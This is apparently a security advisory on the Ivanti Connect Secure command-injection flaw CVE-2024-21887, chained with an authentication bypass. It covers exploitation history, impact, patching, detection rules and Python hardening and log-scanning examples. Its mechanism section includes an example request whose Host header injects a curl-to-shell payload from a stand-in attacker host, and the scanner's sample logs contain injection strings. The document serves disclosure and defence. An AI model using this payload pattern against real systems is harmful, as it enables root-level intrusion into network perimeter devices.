Background
Ivanti Connect Secure (formerly Pulse Secure) is a widely-deployed SSL VPN solution used by governments, Fortune 500 companies, and critical infrastructure operators worldwide. Policy Secure is Ivanti’s network access control solution sharing a common codebase. Together, these products gate access to internal networks for remote workers and third-party vendors, making them extremely high-value targets — successful exploitation provides an attacker with a foothold directly at the network perimeter.
CVE-2024-21887 was disclosed by Ivanti on January 10, 2024, as part of a pair of vulnerabilities alongside CVE-2023-46805. While CVE-2024-21887 technically requires authentication to exploit, threat actors immediately chained it with the authentication bypass (CVE-2023-46805) to achieve fully unauthenticated remote code execution. By the time the advisory was published, Volexity had already documented exploitation in the wild dating back to December 2023.
Technical Mechanism
CVE-2024-21887 is a command injection vulnerability in the web component of Ivanti Connect Secure. The affected endpoint accepts user-supplied data that is passed directly to system commands without adequate sanitisation.
Specifically, the vulnerability exists in several administrative API endpoints accessible via HTTPS. The Host header or specific request parameters submitted to these endpoints are incorporated into shell commands executed by the appliance’s underlying operating system. An attacker with valid administrative credentials can inject shell metacharacters (;, |, $(), backticks) to break out of the intended command context:
GET /api/v1/totp/user-backup-code/../../system?cmd=id HTTP/1.1
Host: target.example.com; curl${IFS}attacker.com/payload|sh
Authorization: Bearer <stolen_or_default_token>
When chained with CVE-2023-46805 (an authentication bypass in the /api/v1/auth endpoint that uses path traversal to circumvent authentication checks), the exploit chain becomes:
- Step 1 (CVE-2023-46805): Send a crafted request to bypass authentication and obtain or impersonate an authenticated session.
- Step 2 (CVE-2024-21887): From the now-authenticated context, call a vulnerable administrative endpoint with a command payload embedded in a header or parameter.
- Step 3: The underlying Perl/Python script on the appliance executes the injected command as root.
The appliances run a hardened Linux environment, but the web service runs as root, so command execution is immediately at the highest privilege level.
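The injection pattern described above, reduced to its essence as an added example written for this page (it is not Ivanti's own code; the appliance's Perl/Python scripts are not reproduced here). A diagnostic helper pastes a header value into a shell command string, beside a hardened version that validates the value against a strict hostname allowlist and builds an argv list so no shell ever parses it. The command `/bin/ping`, the function names and the sample values are assumptions for illustration; the commands are returned, not executed.

```python
import re
import shlex

# Allowlist for an RFC 1123 style hostname: dot-separated labels of letters,
# digits and hyphens, no leading or trailing hyphen, at most 253 characters.
# Anything a shell would interpret (';', '|', '$', backticks, spaces, '/') fails.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_hostname(value: str) -> bool:
    """True only for values that match the hostname allowlist."""
    return bool(_HOSTNAME_RE.match(value))


def vulnerable_command(host: str) -> str:
    """The shape of the bug: an untrusted header value interpolated into a
    command string that is later handed to a shell. Returned for inspection
    only (hypothetical diagnostic command, not the appliance's real one)."""
    return f"/bin/ping -c 1 {host}"


def hardened_command(host: str) -> list:
    """Validate first, then build an argv list. With no shell involved,
    metacharacters in `host` are passed as literal bytes, never parsed."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected host value: {host!r}")
    # '--' stops option parsing in case a value ever starts with '-'.
    return ["/bin/ping", "-c", "1", "--", host]


def quoted_for_shell(host: str) -> str:
    """Fallback when a shell is unavoidable: quote the value so the shell
    treats it as one literal word. Allowlist validation still comes first."""
    return shlex.quote(host)


if __name__ == "__main__":
    benign = "vpn.example.com"
    hostile = "vpn.example.com; id"          # constructed sample, benign command
    print("vulnerable:", vulnerable_command(hostile))
    print("hardened:  ", hardened_command(benign))
    try:
        hardened_command(hostile)
    except ValueError as exc:
        print("rejected:  ", exc)
    print("quoted:    ", quoted_for_shell(hostile))
```

The allowlist is the control that matters: a blocklist of metacharacters would still miss constructs such as `${IFS}`, whereas a hostname pattern rejects `$`, `{` and `}` outright. Run the block with `python3 example.py` to see the three outcomes.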
Real-World Exploitation Evidence
Volexity first documented exploitation of this chain in early December 2023, weeks before the public advisory. The threat group, tracked by Volexity as UTA0178 and subsequently linked to Chinese state-sponsored actors, deployed a custom web shell dubbed GLASSTOKEN.
Key documented activity:
- GLASSTOKEN: A lightweight web shell written in Perl, installed in the appliance’s web root, providing persistent command execution. The malware modified legitimate Ivanti components to survive integrity checks.
- LIGHTWIRE and ZIPLINE: Mandiant documented additional malware families deployed post-exploitation, including passive backdoors that listen on raw network sockets to avoid triggering web server logs.
- Credential harvesting: Attackers extracted cached VPN credentials, Active Directory credentials passed through the appliance, and SAML signing certificates — enabling lateral movement into the target’s internal network.
- Widespread exploitation: CISA issued an emergency directive (ED 24-01) requiring all federal agencies to immediately disconnect affected Ivanti products or apply mitigations. Over 1,700 appliances were found compromised globally within weeks of disclosure.
Impact Assessment
Successful exploitation of this chain provides root-level code execution on the VPN appliance, which sits at the network boundary. Immediate impacts include:
- Full credential interception: All VPN authentication traffic passes through the appliance; attackers can harvest plaintext credentials.
- Session hijacking: Active VPN sessions can be hijacked, providing access to internal network segments those users are authorised for.
- Lateral movement staging: The appliance is typically trusted internally; attackers use it as a pivot point for scanning and attacking internal systems.
- Persistence that survives factory reset: Mandiant documented malware that survived the factory reset process by persisting in a partition not wiped during reset operations.
- SAML certificate theft: If the appliance is configured as a SAML IdP or SP, attackers can exfiltrate signing certificates, enabling token forgery attacks against downstream services.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Ivanti Connect Secure | 9.x, 22.x (all) | 22.7R2.4+ (patch released Feb 2024) |
| Ivanti Policy Secure | 9.x, 22.x (all) | 22.7R1.2+ |
| Ivanti Neurons for ZTA | 22.x (all) | 22.7R2.3+ |
Note: Ivanti initially released workarounds via an XML configuration import before full patches were available.
Remediation Steps
- Apply patches immediately: Upgrade to the fixed versions listed above via the Ivanti download portal. Ivanti released patches on a rolling basis starting in late January 2024.
- Run the Integrity Checker Tool (ICT): Ivanti released a dedicated ICT to detect signs of compromise before patching. Run it against all appliances:
  # Via Ivanti admin UI: Maintenance > Diagnostics > Integrity Check
- Factory reset before patching: CISA and Ivanti both recommend performing a factory reset before applying patches if compromise is suspected, as the malware may persist across software upgrades.
- Revoke and rotate all credentials: Treat all credentials that have passed through the appliance as compromised. This includes VPN user credentials, service accounts, and any SAML certificates.
- Apply Ivanti's XML mitigation file: As a temporary workaround before patching, import Ivanti's published mitigation XML file to disable affected endpoints.
- Enable Ivanti's external ICT: A cloud-based integrity check tool was released to detect newer malware variants that the local ICT missed.
Detection Guidance
Key log sources:
- Ivanti Connect Secure system logs (`/var/log/messages`, `/var/log/web.log`)
- Network flow logs showing unusual outbound connections from the appliance
- EDR/NDR alerts on the internal network for pivot activity
Indicators of Compromise:
- Unexpected `.pl`, `.py`, or `.cgi` files in `/home/webserver/htdocs/`
- Modifications to `/etc/cron.d/` entries
- Outbound connections from the appliance to non-corporate IPs on ports 443, 4444, or 8443
- Log entries showing requests to `/api/v1/totp/user-backup-code/` with path traversal sequences
Suricata signature (matched on the raw URI buffer, because Suricata's normalised `http.uri` buffer resolves `../` segments and would never contain the traversal sequence):
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Ivanti Connect Secure CVE-2024-21887 Exploit Attempt"; flow:established,to_server; http.uri.raw; content:"/api/v1/totp/user-backup-code/"; content:"../"; distance:0; sid:9000021; rev:1;)
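The log-based indicator above (traversal requests to `/api/v1/totp/user-backup-code/`) and the command-injection pattern from the technical section, turned into a small log scanner as an added example for this page. It is not an Ivanti tool, and the log line layout is a constructed, simplified access-log shape: the real `/var/log/web.log` format is not reproduced, so the `parse_line` regex would need adjusting for a genuine export. It goes one step beyond the Suricata rule by percent-decoding the path before looking for `../`, so encoded and double-encoded variants are not missed, and it also flags Host values that carry shell metacharacters.

```python
import re
from urllib.parse import unquote

TRAVERSAL_PREFIX = "/api/v1/totp/user-backup-code/"
SHELL_METACHARS = set(";|&$`()<>\n\r'\"\\ ")

# Constructed sample lines (hypothetical layout: timestamp, client IP,
# method, path, host= header value, status). The traversal request on the
# second line mirrors the page's own example; the third is its percent-encoded
# form; the fourth carries a benign shell metacharacter in the Host value.
SAMPLE_LOG = """\
2024-01-11T03:12:07Z 203.0.113.10 GET /dana-na/auth/url_default/welcome.cgi host=vpn.example.com 200
2024-01-11T03:12:09Z 203.0.113.10 GET /api/v1/totp/user-backup-code/../../system?cmd=id host=vpn.example.com 200
2024-01-11T03:12:11Z 203.0.113.10 GET /api/v1/totp/user-backup-code/%2e%2e/%2e%2e/system host=vpn.example.com 200
2024-01-11T03:12:13Z 203.0.113.10 GET /api/v1/configuration/users host=vpn.example.com;id 200
2024-01-11T03:15:44Z 198.51.100.7 GET /dana/home/index.cgi host=vpn.example.com 200
"""

_LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"host=(?P<host>\S+) (?P<status>\d{3})$"
)


def parse_line(line: str):
    """Split one sample-format line into fields; None if it does not parse."""
    m = _LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_path(path: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so %2e%2e%2f and double-encoded
    forms collapse to the literal sequence, then lower-case for matching."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def is_traversal_attempt(path: str) -> bool:
    """Request to the backup-code endpoint that climbs out of it."""
    decoded = decode_path(path)
    return decoded.startswith(TRAVERSAL_PREFIX) and (
        "../" in decoded or "..\\" in decoded
    )


def host_has_shell_metachars(host: str) -> bool:
    """A Host value that a shell would interpret is never legitimate."""
    return any(c in SHELL_METACHARS for c in host)


def scan_log(text: str) -> list:
    """Return one finding per suspicious line, tagged with the reason."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_traversal_attempt(rec["path"]):
            findings.append({"reason": "path-traversal", **rec})
        if host_has_shell_metachars(rec["host"]):
            findings.append({"reason": "host-metachar", **rec})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['reason']}: {f['method']} {f['path']} host={f['host']}")
```

Bear in mind that the appliance's own web log is one of the artefacts a successful intruder can tamper with, which is why the page also lists network flow logs and EDR/NDR telemetry: correlate findings from this kind of scan with an off-box source before trusting a clean result.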
Timeline
| Date | Event |
|---|---|
| December 2023 | Ivanti learns of exploitation; Volexity observes UTA0178 activity |
| January 10, 2024 | Ivanti publishes advisory for CVE-2024-21887 and CVE-2023-46805 |
| January 11, 2024 | CISA adds both CVEs to KEV catalogue |
| January 19, 2024 | CISA issues Emergency Directive 24-01 for federal agencies |
| February 1, 2024 | First patches released for Connect Secure 22.x |
| February 2024 | Mandiant publishes ZIPLINE/LIGHTWIRE malware analysis |
| March 2024 | CISA confirms ICT bypass by advanced threat actors |